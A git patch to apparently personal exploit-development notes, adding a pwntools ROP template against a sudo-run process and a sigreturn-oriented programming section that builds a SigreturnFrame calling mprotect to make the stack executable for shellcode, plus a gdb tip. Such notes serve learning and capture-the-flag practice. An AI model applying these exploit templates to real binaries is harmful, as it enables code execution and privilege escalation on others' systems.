From 363d96b77aff12e101dd379e9f71ff4d34ec94bd Mon Sep 17 00:00:00 2001
From: whx <stefan@stefan.works>
Date: Wed, 5 Apr 2023 19:38:01 +0200
Subject: [PATCH] bump

---
 Exploits/Binaries/Ropping.md        | 60 ++++++++++++++++++++++++++++-
 Exploits/Binaries/gdb CheatSheet.md |  7 ++++
 2 files changed, 65 insertions(+), 2 deletions(-)

diff --git a/Exploits/Binaries/Ropping.md b/Exploits/Binaries/Ropping.md
index 8abd17c..78335d2 100644
--- a/Exploits/Binaries/Ropping.md
+++ b/Exploits/Binaries/Ropping.md
@@ -3,9 +3,10 @@
 ## Usage
 
 * Find cyclic buffer size
-* Find gadgets via `ropper` or even better `ropstar`
+* Find gadgets via `ropper`, `ROPgadget --binary` or even better `ropstar`
 
 ## Example
+
 ```python
 from pwn import *
 
@@ -14,7 +15,6 @@ p = s.process(['sudo', '<process>'])
 
 offset=<found_offset_len>
 
-# take the ropchain from ropstar
 payload = cyclic(offset)
 payload += p64(0x4711)
 payload += p64(0x235)
@@ -26,3 +26,59 @@ print(p.recv())
 p.sendline("/bin/sh")
 p.interactive(prompt='')
 ```
+
+## SIG ROP
+
+Sigreturn oriented programming.
+
+### What is it?
+
+The manual for `sigreturn` states the following
+
+> sigreturn, rt_sigreturn - return from signal handler and cleanup stack frame
+
+Further, `mprotect` provides a writeable and executable memory segment. Even `NX` is nullified in this way and the stack will be executable.
+
+From the `mprotect` manual
+
+> The  mprotect() function shall change the access protections to be that specified by prot for those whole pages containing any part of the address space of the process starting at address addr and continuing for len bytes. 
+
+### Usage
+
+First, use `mprotect` on a memory segment. Use the `Minimum Address` provided by a Ghidra import to get an address to write to.
+
+```
+ROPgadget ---binary <binary> | grep ": syscall"
+```
+
+Use this found address as a start to craft a frame via pwntools
+
+```python
+from pwn import *
+context.clear(arch='amd64')
+context.terminal = ["urxvt", "-e", "sh", "-c"] 
+p = process(<process>) 
+shellcode = <shellcode from shellstorm>
+
+SYSCALL = <address found by ROPgadget previously>
+
+VULERNERABLE_FUNCTION = p64(<vulnerable function address>)
+VULERNABLE_POINTER = <Instruction Pointer to vulnerable function>
+WRITEABLE_ADDRESS = <Minimum address provided by Ghidra import>
+
+frame = SigreturnFrame(kernel="amd64")
+frame.rax = 10  # mprotect syscall
+frame.rdi = WRITEABLE_ADDRESS
+frame.rsi = <stackframe size>
+frame.rdx = 7  # rwx
+frame.rsp = VULERNABLE_POINTER
+frame.rip = SYSCALL
+
+payload = b'A' * <found len> + VULERNERABLE_FUNCTION + p64(SYSCALL) + bytes(frame)
+p.sendline(payload)
+p.recv()
+
+p.interactive(p) # or gdb.attach(p)
+```
+
+
diff --git a/Exploits/Binaries/gdb CheatSheet.md b/Exploits/Binaries/gdb CheatSheet.md
index 8924e6f..42d70e3 100644
--- a/Exploits/Binaries/gdb CheatSheet.md	
+++ b/Exploits/Binaries/gdb CheatSheet.md	
@@ -6,3 +6,10 @@
 ```sh
 p *(char **)$rax
 ```
+
+## Show Instructions
+
+Show the next 70 instructions under the current position
+```sh
+x/70i $pc
+```